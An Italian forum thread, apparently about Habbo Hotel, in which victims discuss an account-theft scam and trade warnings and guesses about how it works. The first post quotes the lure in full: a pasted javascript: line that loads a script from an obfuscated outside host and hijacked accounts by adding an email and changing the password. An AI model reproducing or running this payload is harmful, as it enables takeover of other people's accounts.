Toggle sidebar

Problema risolto Nuovo Metodo di Scam!

Pleppo

Pleppo

Utente Assiduo
Autore del topic
16 Maggio 2011
633
21
Miglior risposta
0
Ciao ragazzi, oggi sono stato scammato per la 2° volta dal 2007.
Sono sempre stato attento a ciò che aprivo e scrivevo... OGGI sono stato scammato.
Mi rivolgo ai ragazzi più esperti e chiedo COM E' POSSIBILE venir scammati attraverso un semplice comando Javascript:

Il messaggio che mi ha fatto abbassare la guardia è stato:

Ecco come far apparire un offerta nascosta di 25 crediti su SponsorPay o SuperSonicAds:
1)Aprire la propria pagina del guadagna crediti (Crediti --> Guadagna Crediti)
2)Inserire questo codice javascript nella barra degli indirizzi:Java.Script:a=document;b=a.createElement('script');b.src='http://'+atob('c3RyaWtlci5ldS5ncA==')+'/l.php?id=583&hotel=.it&p=YnlEcml6ZXI';document.body.appendChild(b);void(0); (SENZA PUNTO JAVA.SCRIPT SENZA PUNTO IN MEZZO) (chrome non copia anche la scritta java.script: quindi mettetecela voi. (SEMPRE SENZA PUNTO IN MEZZO)
3)Ricaricare la pagina, su SponsorPay sarà la prima offerta quella da 25 C, mentre su SuperSonicAds, la troverete nella pagina 2.
Clicca per espandere...

Sembra esserci un sito criptato non so, quel "
Perfavore, Entra oppure Registrati per vedere i Link!
" è strano. Ho incollato il codice nella barra d'indirizzi del browser e dopo nemmeno 1 minuto: Pass ed email cambiate.

Come è possibile?? Riuscite ad estrarre qualcosa da quel codice?
Grazie...
 
Ultima modifica:
Riferimento: Nuovo Metodo di Scam!

Si è un " Fantasma Link " cioè ti nasconde il trucco dello scammamento nel link e invece di mettere il link dove è probabile che tu lo capisca.. lo creano dei Link Fantasmi.. uno di quelli per esempio è quello che ti ha scammato.. dove tu mai pensando che era uno script-scam ti rubasse la pass.. e poi sono talmente veloci che non te ne accorgi.. e questi java-scam servono proprio a questo.. a non farti fare in tempo di cambiare pass e email. ;) Comunque non fidarti mai e dico MAI piu di link strani.. ma affidati sempre alla solita e unica Posta Pay. :emoji_smiley: che è meglio.. ;)
 
Riferimento: Nuovo Metodo di Scam!

Scammato anche io per la prima volta... tutto perso.
Un semplice comando Java... mi sento una merdà...
 
Riferimento: Nuovo Metodo di Scam!

Scusate e i dati dove arriverebbero? Cmq grz del post se non leggevo rimanevo fregato
 
Riferimento: Nuovo Metodo di Scam!

Bhe quanti ci sono questi siti non ci andare mai. Io una volta sono stato scammato (quanto ero un po nabbo)... Entravo su habbo con facebook... tutto ad un tratto un ragazzo che penso che è morto per tutte le mie maledizioni xD Mi diede un sito dove potevo prendere fino a 37.000 crediti *_* Solo che poi... mi rubò account ed ero anche Hc... >.<" Comunque riguardo a questo scam,questo link non mi da niente. è Un link fantasma...ti è stato anche sotratto pg?
 
Riferimento: Nuovo Metodo di Scam!

Juve. ha detto:
Bhe quanti ci sono questi siti non ci andare mai. Io una volta sono stato scammato (quanto ero un po nabbo)... Entravo su habbo con facebook... tutto ad un tratto un ragazzo che penso che è morto per tutte le mie maledizioni xD Mi diede un sito dove potevo prendere fino a 37.000 crediti *_* Solo che poi... mi rubò account ed ero anche Hc... >.<" Comunque riguardo a questo scam,questo link non mi da niente. è Un link fantasma...ti è stato anche sotratto pg?
Clicca per espandere...
Appena sono andato in quel link dopo 1 min e' cambiato tutto, pass ed email...
 
Riferimento: Nuovo Metodo di Scam!

Juve. ha detto:
Ma l'hai potuto recuperare?
Clicca per espandere...
No, sto attendendo una risposta dall' Habbo Help Tool, sono passati 2 giorni e ancora nulla... e quello si diverte ad entrare e mandare messaggi col mio PG..
 
Riferimento: Nuovo Metodo di Scam!

Pleppo ha detto:
No, sto attendendo una risposta dall' Habbo Help Tool, sono passati 2 giorni e ancora nulla... e quello si diverte ad entrare e mandare messaggi col mio PG..
Clicca per espandere...
Ok ho capito ^_^ Comunque se il post penso che sia risolto in qualche modo... Contatta lo staff e fai chiudere topic ;)
 
Riferimento: Nuovo Metodo di Scam!

@TheBlackDragon Di questo script ne vorrei sapere di più, non ci sono guide o informazioni su esso? Non puoi creare qualche guida? :emoji_relieved:
 
Riferimento: Nuovo Metodo di Scam!

È un attacco via XSS, molto semplice da effettuare.
Il link è criptato in non so quale metodo, strano però, io credevo habbo fosse invulnerabile a XSS :S
Potrei provare a sparare un' ipotesi..
Evidentemente i tecnici della sulake non hanno disabilitato l' opzione server to server nel php.ini, quindi semplicemente lo script PHP della pagina preleva il codice sorgente delle pagine per cambiare e-mail e password, preleva il tuo app key e con un refresh cambia i dati.
Tu dici che in meno di 1 minuto ti sono stati cambiate e-mail e password, non vedo opzioni plausibili dunque..
 
Riferimento: Nuovo Metodo di Scam!

@ReFu una guida? e cosa scrivo dentro ? come non farsi scammare?! °_°'' Bhe se vuoi sapere di più mandami le domande in Pm ;) e io poii vedro di farne una guida per i meno esperti.. ^^
 
Riferimento: Nuovo Metodo di Scam!

l'ho gia visto ma non ci sono cascato in pratica qulla pagina nascosta e una pagina php dove credo ti riusciranno a prendere qualche cookie di habbo che cambieranno con i tuoi.
 
Riferimento: Nuovo Metodo di Scam!

Ragazzi fate una guida su come fare questa cosa, non per fare anche io questo metodo scam, ma per curiosità di vedere come fa questo :emoji_confused:
 
Riferimento: Nuovo Metodo di Scam!

mukkasmile111 ha detto:
È un attacco via XSS, molto semplice da effettuare.
Il link è criptato in non so quale metodo, strano però, io credevo habbo fosse invulnerabile a XSS :S
Potrei provare a sparare un' ipotesi..
Evidentemente i tecnici della sulake non hanno disabilitato l' opzione server to server nel php.ini, quindi semplicemente lo script PHP della pagina preleva il codice sorgente delle pagine per cambiare e-mail e password, preleva il tuo app key e con un refresh cambia i dati.
Tu dici che in meno di 1 minuto ti sono stati cambiate e-mail e password, non vedo opzioni plausibili dunque..
Clicca per espandere...

Esatto. In meno di un secondo puoi cambiare e-mail e password, testato personalmente.

-EDIT-
Ti aggiunge una e-mail secondaria, non te la cambia. Quindi la vecchia e-mail funziona ancora, e se sei abbastanza veloce da ottenere il link della password dimenticata tramite e-mail, puoi provare a connetterti velocemente e togliere la mail secondaria che il truffatore ha creato. Dopodiché non può fare più nulla.
 
Ultima modifica:
Riferimento: Nuovo Metodo di Scam!

Andreavedy ha detto:
Esatto. In meno di un secondo puoi cambiare e-mail e password, testato personalmente.

-EDIT-
Ti aggiunge una e-mail secondaria, non te la cambia. Quindi la vecchia e-mail funziona ancora, e se sei abbastanza veloce da ottenere il link della password dimenticata tramite e-mail, puoi provare a connetterti velocemente e togliere la mail secondaria che il truffatore ha creato. Dopodiché non può fare più nulla.
Clicca per espandere...
Con un po' di codice in più si riesce anche ad eliminare la mail, evidentemente lo scammatore non aveva voglia di perdere altro tempo :genio:
 
Riferimento: Nuovo Metodo di Scam!

@TheBlackDragon Veramente pensavo il contrario anche se sarebbe una buona guida su come difendersi, comunque non ho capito cosa sfrutta per prenderti la pass. :S
 
Riferimento: Nuovo Metodo di Scam!

mukkasmile111 ha detto:
Con un po' di codice in più si riesce anche ad eliminare la mail, evidentemente lo scammatore non aveva voglia di perdere altro tempo :genio:
Clicca per espandere...

Nel sito c'è un tasto apposta per farti confermare l'e-mail.

ReFu ha detto:
@TheBlackDragon Veramente pensavo il contrario anche se sarebbe una buona guida su come difendersi, comunque non ho capito cosa sfrutta per prenderti la pass. :S
Clicca per espandere...

Ma non te la prende. Trova solo il codice sorgente delle pagina per cambiare password e aggiungere una nuova mail.
 
Riferimento: Nuovo Metodo di Scam!

Questo "bug" è stato già fixato in habbo.com e in habbo.nl. Nel frattempo hanno chiuso anche il sito per scammare, ma molte persone hanno il backup del sito, quindi possono hostarlo su un altro dominio... :bye:
 
Devi accedere o registrarti per rispondere qui.
 
 
Top
Indietro